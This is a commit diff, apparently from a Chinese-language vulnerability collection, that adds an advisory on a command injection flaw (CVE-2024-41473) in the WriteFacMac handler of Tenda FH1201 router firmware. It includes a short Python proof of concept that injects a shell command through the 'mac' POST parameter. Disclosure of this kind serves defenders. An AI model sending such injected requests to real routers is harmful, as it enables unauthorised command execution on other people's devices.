整理文件

2024-08-21 15:08:43 +08:00
parent fcad930af3
commit 299ba35f30
1043 changed files with 0 additions and 3 deletions
--- a/Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md
+++ b/Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md
@@ -0,0 +1,26 @@
+# Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)
+
+Tenda FH1201 v1.2.0.14 存在命令注入漏洞，位于 WriteFacMac 函数中。mac 参数未经任何过滤就被复制到 var 中，然后执行，因此攻击者可利用此漏洞执行任意命令
+
+固件下载网址：https://www.tendacn.com/download/detail-3322.html
+
+![image-20240730214702940](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407302147986.png)
+
+## poc
+
+```python
+import requests
+
+ip = '192.168.74.145'
+
+url = "http://" + ip + "/goform/WriteFacMac"
+payload = ";echo 'hacker!'"
+
+data = {"mac": payload}
+response = requests.post(url, data=data)
+print(response.text)
+```
+
+## 漏洞来源
+
+- https://github.com/iotresearch/iot-vuln/tree/main/Tenda/FH1201/WriteFacMac